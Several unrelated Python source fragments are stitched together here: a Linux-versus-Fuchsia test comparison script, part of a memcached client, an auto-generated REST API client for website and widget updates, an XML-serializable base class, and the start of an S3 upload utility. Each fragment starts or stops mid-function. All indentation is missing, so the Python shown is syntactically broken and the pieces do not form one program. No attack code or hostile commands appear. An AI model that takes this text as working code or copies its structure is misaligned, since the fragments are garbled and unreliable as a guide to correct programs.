paired_tests = MapDictValues(paired_tests, CompareTests)
return {"name": linux.name, "tests": paired_tests}
else:
# One of them has to be non-null, by the way ZipListsByPredicate functions
assert linux or fuchsia
if linux:
logging.error("Fuchsia was missing test target {}".format(linux.name))
else:
logging.error("Linux was missing test target {}".format(fuchsia.name))
return None
def CompareTests(linux: TestStats, fuchsia: TestStats) -> Dict[str, Any]:
"""As CompareTargets, but at the test level"""
if not linux and not fuchsia:
logging.error("Two null TestStats objects were passed to CompareTests.")
return {}
if not linux or not fuchsia:
if linux:
name = linux.name
failing_os = "Fuchsia"
else:
name = fuchsia.name
failing_os = "Linux"
logging.error("%s failed to produce output for the test %s",
failing_os, name)
return {}
assert linux.name == fuchsia.name
paired_lines = ZipListsByPredicate(linux.lines, fuchsia.lines,
lambda line: line.desc)
paired_lines = MapDictValues(paired_lines, CompareLines)
result = {"lines": paired_lines, "unit": "ms"} # type: Dict[str, Any]
if linux:
result["name"] = linux.name
result["linux_avg"] = linux.time_avg
result["linux_dev"] = linux.time_dev
result["linux_cv"] = linux.cv
if fuchsia == None:
logging.warning("Fuchsia is missing test case {}".format(linux.name))
else:
result["name"] = fuchsia.name
result["fuchsia_avg"] = fuchsia.time_avg
result["fuchsia_dev"] = fuchsia.time_dev
result["fuchsia_cv"] = fuchsia.cv
return result
def CompareLines(linux: LineStats, fuchsia: LineStats) -> Dict[str, Any]:
"""CompareLines wraps two LineStats objects up as a JSON-dumpable dict.
It also logs a warning every time a line is given which can't be matched up.
If both lines passed are None, or their units or descriptions are not the same
(which should never happen) this function fails.
"""
if linux != None and | |
module calculate a hash value.
You may prefer, for example, to keep all of a given user's
objects on the same memcache server, so you could use the
user's unique id as the hash value.
@return: Nonzero on success.
@rtype: int
@param time: Tells memcached the time which this value should
expire, either as a delta number of seconds, or an absolute
unix time-since-the-epoch value. See the memcached protocol
docs section "Storage Commands" for more info on <exptime>. We
default to 0 == cache forever.
@param min_compress_len: The threshold length to kick in
auto-compression of the value using the compressor
routine. If the value being cached is a string, then the
length of the string is measured, else if the value is an
object, then the length of the pickle result is measured. If
the resulting attempt at compression yeilds a larger string
than the input, then it is discarded. For backwards
compatability, this parameter defaults to 0, indicating don't
ever try to compress.
@param noreply: optional parameter instructs the server to not
send the reply.
'''
return self._set("set", key, val, time, min_compress_len, noreply)
def cas(self, key, val, time=0, min_compress_len=0, noreply=False):
'''Check and set (CAS)
Sets a key to a given value in the memcache if it hasn't been
altered since last fetched. (See L{gets}).
The C{key} can optionally be an tuple, with the first element
being the server hash value and the second being the key. If
you want to avoid making this module calculate a hash value.
You may prefer, for example, to keep all of a given user's
objects on the same memcache server, so you could use the
user's unique id as the hash value.
@return: Nonzero on success.
@rtype: int
@param time: Tells memcached the time which this value should
expire, either as a delta number of seconds, or an absolute
unix time-since-the-epoch value. See the memcached protocol
docs section "Storage Commands" for more info on <exptime>. We
default to 0 == cache forever.
@param min_compress_len: The threshold length to kick in
auto-compression of the value using the compressor
routine. If the value being cached is a string, then the
length of the string is measured, else if the value is an
object, then the length of the pickle result is measured. If
the resulting attempt at compression yeilds a larger string
than the input, then it is discarded. For backwards
compatability, this parameter defaults to 0, indicating don't
ever try to compress.
@param noreply: optional parameter instructs the server to not
send the reply.
'''
return self._set("cas", key, val, time, min_compress_len, noreply)
def _map_and_prefix_keys(self, key_iterable, key_prefix):
"""Compute the mapping of server (_Host instance) -> list of keys to
stuff onto that server, as well as the mapping of prefixed key
-> original key.
"""
key_prefix = self._encode_key(key_prefix)
# Check it just once ...
key_extra_len = len(key_prefix)
if key_prefix and self.do_check_key:
self.check_key(key_prefix)
# server (_Host) -> list of unprefixed server keys in mapping
server_keys = {}
prefixed_to_orig_key = {}
# build up a list for each server of all the keys we want.
for orig_key in key_iterable:
if isinstance(orig_key, tuple):
# Tuple of hashvalue, key ala _get_server(). Caller is
# essentially telling us what server to stuff this on.
# Ensure call to _get_server gets a Tuple as well.
serverhash, key = orig_key
key = self._encode_key(key)
if not isinstance(key, six.binary_type):
# set_multi supports int / long keys.
key = str(key)
if six.PY3:
key = key.encode('utf8')
bytes_orig_key = key
# Gotta pre-mangle key before hashing to a
# server. Returns the mangled key.
server, key = self._get_server(
(serverhash, key_prefix + key))
orig_key = orig_key[1]
else:
key = self._encode_key(orig_key)
if not isinstance(key, six.binary_type):
# set_multi supports int / long keys.
key = str(key)
if six.PY3:
key = key.encode('utf8')
bytes_orig_key = key
server, key = self._get_server(key_prefix + key)
# alert when passed in key is None
if orig_key is None:
self.check_key(orig_key, key_extra_len=key_extra_len)
# Now check to make sure key length is proper ...
if self.do_check_key:
self.check_key(bytes_orig_key, key_extra_len=key_extra_len)
if not server:
continue
if server not in server_keys:
server_keys[server] = []
server_keys[server].append(key)
prefixed_to_orig_key[key] = orig_key
return (server_keys, prefixed_to_orig_key)
def set_multi(self, mapping, time=0, key_prefix='', min_compress_len=0,
noreply=False):
'''Sets multiple keys in the memcache doing just one query.
>>> notset_keys = mc.set_multi({'key1' : 'val1', 'key2' : 'val2'})
>>> mc.get_multi(['key1', 'key2']) == {'key1' : 'val1',
... 'key2' : 'val2'}
1
This method is recommended over regular L{set} as it lowers
the number of total packets flying around your network,
reducing total latency, since your app doesn't have to wait
for each round-trip of L{set} before sending the next one.
@param mapping: A dict of key/value pairs to set.
@param time: Tells memcached the time which this value should
expire, either as a delta number of seconds, or an
absolute unix time-since-the-epoch value. See the
memcached protocol docs section "Storage Commands" for
more info on <exptime>. We default to 0 == cache forever.
@param key_prefix: Optional string to prepend to each key when
sending to memcache. Allows you to efficiently stuff these
keys into a pseudo-namespace in memcache:
>> notset_keys = mc.set_multi(
... {'key1' : 'val1', 'key2' : 'val2'},
... key_prefix='subspace_')
>>> len(notset_keys) == 0
True
>>> mc.get_multi(['subspace_key1',
... 'subspace_key2']) == {'subspace_key1': 'val1',
... 'subspace_key2' : 'val2'}
True
Causes key 'subspace_key1' and 'subspace_key2' to be
set. Useful in conjunction with a higher-level layer which
applies namespaces to data in memcache. In this case, the
return result would be the list of notset original keys,
prefix not applied.
@param min_compress_len: The threshold length to kick in
auto-compression of the value using the compressor
routine. If the value being cached is a string, then the
length of the string is measured, else if the value is an
object, then the length of the pickle result is
measured. If the resulting attempt at compression yeilds a
larger string than the input, then it is discarded. For
backwards compatability, this parameter defaults to 0,
indicating don't ever try to compress.
@param noreply: optional parameter instructs the server to not
send the reply.
@return: List of keys which failed to be stored [ memcache out
of memory, etc. ].
@rtype: list
'''
self._statlog('set_multi')
server_keys, prefixed_to_orig_key = self._map_and_prefix_keys(
six.iterkeys(mapping), key_prefix)
# send out all requests on each server before reading anything
dead_servers = []
notstored = [] # original keys.
for server in six.iterkeys(server_keys):
bigcmd = []
write = bigcmd.append
try:
for key in server_keys[server]: # These are mangled keys
store_info = self._val_to_store_info(
mapping[prefixed_to_orig_key[key]],
min_compress_len)
if store_info:
flags, len_val, val = store_info
headers = "%d %d %d" % (flags, time, len_val)
fullcmd = self._encode_cmd('set', key, headers,
noreply,
b'\r\n', val, b'\r\n')
write(fullcmd)
else:
notstored.append(prefixed_to_orig_key[key])
server.send_cmds(b''.join(bigcmd))
except socket.error as msg:
if isinstance(msg, tuple):
msg = msg[1]
server.mark_dead(msg)
dead_servers.append(server)
# if noreply, just return early
if noreply:
return notstored
# if any servers died on the way, don't expect them to respond.
for server in dead_servers:
del server_keys[server]
# short-circuit if there are no servers, just return all keys
if not server_keys:
return list(mapping.keys())
for server, keys in six.iteritems(server_keys):
try:
for key in keys:
if server.readline() == b'STORED':
continue
else:
# un-mangle.
notstored.append(prefixed_to_orig_key[key])
except (_Error, socket.error) as msg:
if isinstance(msg, tuple):
msg = msg[1]
server.mark_dead(msg)
return notstored
def _val_to_store_info(self, val, min_compress_len):
"""Transform val to a storable representation.
Returns a tuple of the flags, the length of the new value, and
the new value itself.
"""
flags = 0
if isinstance(val, six.binary_type):
pass
elif isinstance(val, six.text_type):
val = val.encode('utf-8')
elif isinstance(val, int):
flags |= Client._FLAG_INTEGER
val = '%d' % val
if six.PY3:
val = val.encode('ascii')
# force no attempt to compress this silly string.
min_compress_len = 0
elif six.PY2 and isinstance(val, long):
flags |= Client._FLAG_LONG
val = str(val)
if six.PY3:
val = val.encode('ascii')
# force no attempt to compress this silly string.
min_compress_len = 0
| |
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_website_by_id(self, id, body, **kwargs): # noqa: E501
"""update website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_website_by_id(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param Website body: (required)
:return: Website
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_website_by_id_with_http_info(id, body, **kwargs) # noqa: E501
else:
(data) = self.patch_website_by_id_with_http_info(id, body, **kwargs) # noqa: E501
return data
def patch_website_by_id_with_http_info(self, id, body, **kwargs): # noqa: E501
"""update website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_website_by_id_with_http_info(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param Website body: (required)
:return: Website
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_website_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `patch_website_by_id`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_website_by_id`") # noqa: E501
if 'id' in params and not re.search('\d+', params['id'] if type(params['id']) is str else str(params['id'])): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `patch_website_by_id`, must conform to the pattern `/\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/websites/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Website', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_website_group_by_id(self, id, body, **kwargs): # noqa: E501
"""update website group # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_website_group_by_id(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param WebsiteGroup body: (required)
:return: WebsiteGroup
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_website_group_by_id_with_http_info(id, body, **kwargs) # noqa: E501
else:
(data) = self.patch_website_group_by_id_with_http_info(id, body, **kwargs) # noqa: E501
return data
def patch_website_group_by_id_with_http_info(self, id, body, **kwargs): # noqa: E501
"""update website group # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_website_group_by_id_with_http_info(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param WebsiteGroup body: (required)
:return: WebsiteGroup
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_website_group_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `patch_website_group_by_id`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_website_group_by_id`") # noqa: E501
if 'id' in params and not re.search('\d+', params['id'] if type(params['id']) is str else str(params['id'])): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `patch_website_group_by_id`, must conform to the pattern `/\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/groups/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebsiteGroup', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_widget_by_id(self, id, body, **kwargs): # noqa: E501
"""update widget # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_widget_by_id(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param Widget body: (required)
:return: Widget
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_widget_by_id_with_http_info(id, body, **kwargs) # noqa: E501
else:
(data) = self.patch_widget_by_id_with_http_info(id, body, **kwargs) # noqa: E501
return data
def patch_widget_by_id_with_http_info(self, id, body, **kwargs): # noqa: E501
"""update widget # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_widget_by_id_with_http_info(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param Widget body: (required)
:return: Widget
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_widget_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `patch_widget_by_id`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_widget_by_id`") # noqa: E501
if 'id' in params and not re.search('\d+', params['id'] if type(params['id']) is str else str(params['id'])): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `patch_widget_by_id`, must conform to the pattern `/\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/dashboard/widgets/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Widget', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def schedule_auto_discovery_by_device_id(self, id, **kwargs): # noqa: E501
"""schedule active discovery for a device # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schedule_auto_discovery_by_device_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param int start:
:param int end:
:param str netflow_filter:
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.schedule_auto_discovery_by_device_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.schedule_auto_discovery_by_device_id_with_http_info(id, **kwargs) # noqa: E501
return data
def schedule_auto_discovery_by_device_id_with_http_info(self, id, **kwargs): # noqa: E501
"""schedule | |
if key not in self._fields and key[0] != '_']
if len(unexpected_args) > 0:
raise ValueError(
'Received unexpected construction argument {} for attribute '
'collection {}'.format(unexpected_args, self._fields))
for attribute in self._fields:
if attribute in kwargs:
try:
setattr(self, attribute, kwargs.get(attribute, None))
except AttributeError:
# NB: this is included to allow for read only properties without breaking the paradigm
# Silently catching errors can potentially cover up REAL issues.
pass
def __str__(self):
return '{}(**{})'.format(self.__class__.__name__, json.dumps(self.to_dict(check_validity=False), indent=1))
def __repr__(self):
return '{}(**{})'.format(self.__class__.__name__, self.to_dict(check_validity=False))
def __setattr__(self, key, value):
if not (key.startswith('_') or (key in self._fields) or hasattr(self.__class__, key) or hasattr(self, key)):
# not expected attribute - descriptors, properties, etc
logger.warning(
'Class {} instance receiving unexpected attribute {}.\n\t'
'Ensure that this is not a typo of an expected field name.'.format(self.__class__.__name__, key))
object.__setattr__(self, key, value)
def __getstate__(self):
"""
Method for allowing copying and/or pickling of state.
Returns
-------
dict
The dict representation for the object.
"""
return self.to_dict(check_validity=False, strict=False)
def __setstate__(self, the_dict):
"""
Method for reconstructing from the serialized state.
"""
return self.__init__(**the_dict)
def set_numeric_format(self, attribute, format_string):
"""Sets the numeric format string for the given attribute.
Parameters
----------
attribute : str
attribute for which the format applies - must be in `_fields`.
format_string : str
format string to be applied
Returns
-------
None
"""
# Extend this to include format function capabilities. Maybe numeric_format is not the right name?
if attribute not in self._fields:
raise ValueError('attribute {} is not permitted for class {}'.format(attribute, self.__class__.__name__))
self._numeric_format[attribute] = format_string
def _get_formatter(self, attribute):
"""Return a formatting function for the given attribute. This will default to `str` if no other
option is presented.
Parameters
----------
attribute : str
the given attribute name
Returns
-------
Callable
format function
"""
entry = self._numeric_format.get(attribute, None)
if isinstance(entry, str):
fmt_str = '{0:' + entry + '}'
return fmt_str.format
elif callable(entry):
return entry
else:
return str
def log_validity_error(self, msg):
"""
Log a validity check error message.
Parameters
----------
msg : str
"""
valid_logger.error('{}: {}'.format(self.__class__.__name__, msg))
def log_validity_warning(self, msg):
"""
Log a validity check warning message.
Parameters
----------
msg : str
"""
valid_logger.warning('{}: {}'.format(self.__class__.__name__, msg))
def log_validity_info(self, msg):
"""
Log a validation info message.
Parameters
----------
msg : str
"""
valid_logger.info('{}: {}'.format(self.__class__.__name__, msg))
def is_valid(self, recursive=False, stack=False):
"""Returns the validity of this object according to the schema. This is done by inspecting that all required
fields (i.e. entries of `_required`) are not `None`.
Parameters
----------
recursive : bool
True if we recursively check that child are also valid. This may result in verbose (i.e. noisy) logging.
stack : bool
Print a recursive error message?
Returns
-------
bool
condition for validity of this element
"""
all_required = self._basic_validity_check()
if not recursive:
return all_required
valid_children = self._recursive_validity_check(stack=stack)
return all_required & valid_children
def _basic_validity_check(self):
"""
Perform the basic validity check on the direct attributes with no recursive checking.
Returns
-------
bool
True if all requirements *AT THIS LEVEL* are satisfied, otherwise False.
"""
all_required = True
for attribute in self._required:
present = (getattr(self, attribute) is not None)
if not present:
self.log_validity_error("Missing required attribute {}".format(attribute))
all_required &= present
choices = True
for entry in self._choice:
required = entry.get('required', False)
collect = entry['collection']
# verify that no more than one of the entries in collect is set.
present = []
for attribute in collect:
if getattr(self, attribute) is not None:
present.append(attribute)
if len(present) == 0 and required:
self.log_validity_error(
"Exactly one of the attributes {} should be set, but none are set".format(collect))
choices = False
elif len(present) > 1:
self.log_validity_error(
"Exactly one of the attributes {} should be set, but multiple ({}) are set".format(collect,
present))
choices = False
return all_required and choices
def _recursive_validity_check(self, stack=False):
"""
Perform a recursive validity check on all present attributes.
Parameters
----------
stack : bool
Print a recursive error message?
Returns
-------
bool
True if requirements are recursively satisfied *BELOW THIS LEVEL*, otherwise False.
"""
def check_item(value):
if isinstance(value, (Serializable, SerializableArray)):
return value.is_valid(recursive=True, stack=stack)
return True
valid_children = True
for attribute in self._fields:
val = getattr(self, attribute)
good = True
if isinstance(val, (Serializable, SerializableArray)):
good = check_item(val)
elif isinstance(val, list):
for entry in val:
good &= check_item(entry)
# any issues will be logged as discovered, but should we help with the "stack"?
if not good and stack:
self.log_validity_error(
"Issue discovered with attribute {} of type {}.".format(attribute, type(val)))
valid_children &= good
return valid_children
@classmethod
def from_node(cls, node, xml_ns, ns_key=None, kwargs=None):
"""For XML deserialization.
Parameters
----------
node : ElementTree.Element
dom element for serialized class instance
xml_ns : None|dict
The xml namespace dictionary.
ns_key : None|str
The xml namespace key. If `xml_ns` is None, then this is ignored. If `None` and `xml_ns` is not None,
then the string `default` will be used. This will be recursively passed down,
unless overridden by an entry of the cls._child_xml_ns_key dictionary.
kwargs : None|dict
`None` or dictionary of previously serialized attributes. For use in inheritance call, when certain
attributes require specific deserialization.
Returns
-------
Corresponding class instance
"""
if len(node) == 0 and len(node.attrib) == 0:
logger.warning(
'There are no children or attributes associated\n\t'
'with node {}\n\t'
'for class {}.'.format(node, cls))
# return None
def handle_attribute(the_attribute, the_tag, the_xml_ns_key):
if the_xml_ns_key is not None: # handle namespace, if necessary
fetch_tag = '{' + xml_ns[the_xml_ns_key] + '}' + the_tag
else:
fetch_tag = the_tag
kwargs[the_attribute] = node.attrib.get(fetch_tag, None)
def handle_single(the_attribute, the_tag, the_xml_ns_key):
kwargs[the_attribute] = find_first_child(node, the_tag, xml_ns, the_xml_ns_key)
def handle_list(attrib, ch_tag, the_xml_ns_key):
cnodes = find_children(node, ch_tag, xml_ns, the_xml_ns_key)
if len(cnodes) > 0:
kwargs[attrib] = cnodes
if kwargs is None:
kwargs = {}
kwargs['_xml_ns'] = xml_ns
kwargs['_xml_ns_key'] = ns_key
if not isinstance(kwargs, dict):
raise ValueError(
"Named input argument kwargs for class {} must be dictionary instance".format(cls))
for attribute in cls._fields:
if attribute in kwargs:
continue
kwargs[attribute] = None
# This value will be replaced if tags are present
# Note that we want to try explicitly setting to None to trigger descriptor behavior
# for required fields (warning or error)
base_tag_name = cls._tag_overide.get(attribute, attribute)
# determine any expected xml namespace for the given entry
if attribute in cls._child_xml_ns_key:
xml_ns_key = cls._child_xml_ns_key[attribute]
else:
xml_ns_key = ns_key
# verify that the xml namespace will work
if xml_ns_key is not None:
if xml_ns is None:
raise ValueError('Attribute {} in class {} expects an xml namespace entry of {}, '
'but xml_ns is None.'.format(attribute, cls, xml_ns_key))
elif xml_ns_key not in xml_ns:
raise ValueError('Attribute {} in class {} expects an xml namespace entry of {}, '
'but xml_ns does not contain this key.'.format(attribute, cls, xml_ns_key))
if attribute in cls._set_as_attribute:
xml_ns_key = cls._child_xml_ns_key.get(attribute, None)
handle_attribute(attribute, base_tag_name, xml_ns_key)
elif attribute in cls._collections_tags:
# it's a collection type parameter
array_tag = cls._collections_tags[attribute]
array = array_tag.get('array', False)
child_tag = array_tag.get('child_tag', None)
if array:
handle_single(attribute, base_tag_name, xml_ns_key)
elif child_tag is not None:
handle_list(attribute, child_tag, xml_ns_key)
else:
# the metadata is broken
raise ValueError(
'Attribute {} in class {} is listed in the _collections_tags dictionary, but the '
'`child_tag` value is either not populated or None.'.format(attribute, cls))
else:
# it's a regular property
handle_single(attribute, base_tag_name, xml_ns_key)
return cls.from_dict(kwargs)
def to_node(self, doc, tag, ns_key=None, parent=None, check_validity=False, strict=DEFAULT_STRICT, exclude=()):
"""For XML serialization, to a dom element.
Parameters
----------
doc : ElementTree.ElementTree
The xml Document
tag : None|str
The tag name. Defaults to the value of `self._tag` and then the class name if unspecified.
ns_key : None|str
The namespace prefix. This will be recursively passed down, unless overridden by an entry in the
_child_xml_ns_key dictionary.
parent : None|ElementTree.Element
The parent element. Defaults to the document root element if unspecified.
check_validity : bool
Check whether the element is valid before serializing, by calling :func:`is_valid`.
strict : bool
Only used if `check_validity = True`. In that case, if `True` then raise an
Exception (of appropriate type) if the structure is not valid, if `False` then log a
hopefully helpful message.
exclude : tuple
Attribute names to exclude from this generic serialization. This allows for child classes
| |
import os
from pathlib import Path
from typing import Tuple
import boto3
from botocore.client import Config
import gzip
import re
from uuid import uuid4
import json
import query_string
import smart_open.s3
import shutil
import tempfile
import io
from urllib.parse import urlencode
import logging
from .__util_versioned_ref import VersionedRef
from .__util_metadata import FIELDS
WRITE_ALLOWED_CATEGORIES = ['IDS', 'PROCESSED', 'TMP']
DISABLE_GZIP = os.environ.get('DISABLE_GZIP')
ENV = os.environ.get('ENV')
AWS_REGION = os.environ.get('AWS_REGION')
MULTIPART_SIZE = 100 * 1024 * 1024 # don't use multipart if file size is smaller than 100MB
LARGE_FILE_SIZE_THRESHOLD_BYTES = 5 * 2**30 # We have to handle files that are > 5 GB differently
def get_kms_key_name(org_slug):
return f'alias/customer-key-{ENV}-{org_slug}'
def lowerMetadataKeys(metadata):
m = {}
for key, value in metadata.items():
m[key.lower()] = value
return m
def resolveCustomMetadataAndTags(metadata):
custom_metadata_str = metadata.get(FIELDS["CUSTOM_METADATA"], "") or ""
custom_tags_str = metadata.get(FIELDS["CUSTOM_TAGS"], "") or ""
if not custom_tags_str:
custom_tags = []
else:
custom_tags = custom_tags_str.split(",")
return {
'custom_metadata': query_string.parse(custom_metadata_str),
'custom_tags': custom_tags
}
def getOrEmptyString(dic, key, default=''):
val = dic.get(key, default)
if val is None:
return default
return val
class InvalidPathException(Exception):
def __init__(self, path, reason):
super().__init__(f'Invalid path {path}: {reason}')
self.path = path
self.reason = reason
def getUpdatedPipelineHistoryStr(pipeline_id, existing_pipeline_history):
new_pipeline_history = ''
if existing_pipeline_history == '':
new_pipeline_history = pipeline_id
else:
if pipeline_id in existing_pipeline_history:
new_pipeline_history = existing_pipeline_history
else:
new_pipeline_history = existing_pipeline_history + "," + pipeline_id
return new_pipeline_history
class S3FileobjUploader:
def __init__(self, s3, fileobj, params, options={'disable_gzip': False}):
self.s3 = s3
self.fileobj = fileobj
self.params = params
self.disable_gzip = options.get('disable_gzip', False)
self.stream = io.BytesIO()
self.partCount = 0
self.multipart = None
self.parts = []
if not self.disable_gzip:
self.compressor = gzip.GzipFile(fileobj=self.stream, mode='w')
def _uploadPart(self):
print(f'upload multipart {self.partCount}')
if self.partCount == 0:
self.multipart = self.s3.create_multipart_upload(**self.params)
self.partCount += 1
self.stream.seek(0)
part = self.s3.upload_part(
Body=self.stream,
Bucket=self.multipart['Bucket'],
Key=self.multipart['Key'],
PartNumber=self.partCount,
UploadId=self.multipart['UploadId'])
self.parts.append({ **part, 'PartNumber': self.partCount })
self.stream.seek(0)
self.stream.truncate()
def _uploadLastPart(self):
if self.partCount == 0:
self.stream.seek(0)
return self.s3.put_object(
Body=self.stream,
**self.params)
else:
self._uploadPart()
parts = []
for part in self.parts:
parts.append({
'ETag': part['ETag'],
'PartNumber': part['PartNumber']
})
return self.s3.complete_multipart_upload(
Bucket=self.multipart['Bucket'],
Key=self.multipart['Key'],
UploadId=self.multipart['UploadId'],
MultipartUpload={ 'Parts': parts })
def upload(self):
while True:
chunk = self.fileobj.read(1024 * 1024)
if not chunk:
if not self.disable_gzip:
self.compressor.close()
return self._uploadLastPart()
if self.disable_gzip:
self.stream.write(chunk)
else:
self.compressor.write(chunk)
if self.stream.tell() >= MULTIPART_SIZE:
self._uploadPart()
class Datalake:
def __init__(self, endpoint):
#boto3.set_stream_logger(name='botocore', level=logging.DEBUG)
if endpoint:
self.s3 = boto3.client(
's3', endpoint_url=endpoint,
aws_access_key_id='123', aws_secret_access_key='abc',
region_name=AWS_REGION, config=Config(signature_version='s3v4'))
self.resource_kwargs = { 'endpoint_url': endpoint }
else:
self.s3 = boto3.client('s3', region_name=AWS_REGION, config=Config(signature_version='s3v4'))
self.resource_kwargs = None
def get_s3_head(self, file):
bucket = file['bucket']
file_key = file['fileKey']
if 'version' in file:
file_version = file['version']
head = self.s3.head_object(Bucket=bucket, Key=file_key, VersionId=file_version)
else:
head = self.s3.head_object(Bucket = bucket, Key = file_key)
return head
def get_file_meta(self, file):
head = self.get_s3_head(file)
return lowerMetadataKeys(head.get('Metadata'))
def read_file(self, file, form='body'):
bucket = file['bucket']
file_key = file['fileKey']
if 'version' in file:
kwargs = {'VersionId': file['version']}
else:
kwargs = {}
if form == 'body':
response = self.s3.get_object(Bucket=bucket, Key=file_key, **kwargs)
elif form in ['file_obj', 'download']:
response = self.s3.head_object(Bucket=bucket, Key=file_key, **kwargs)
else:
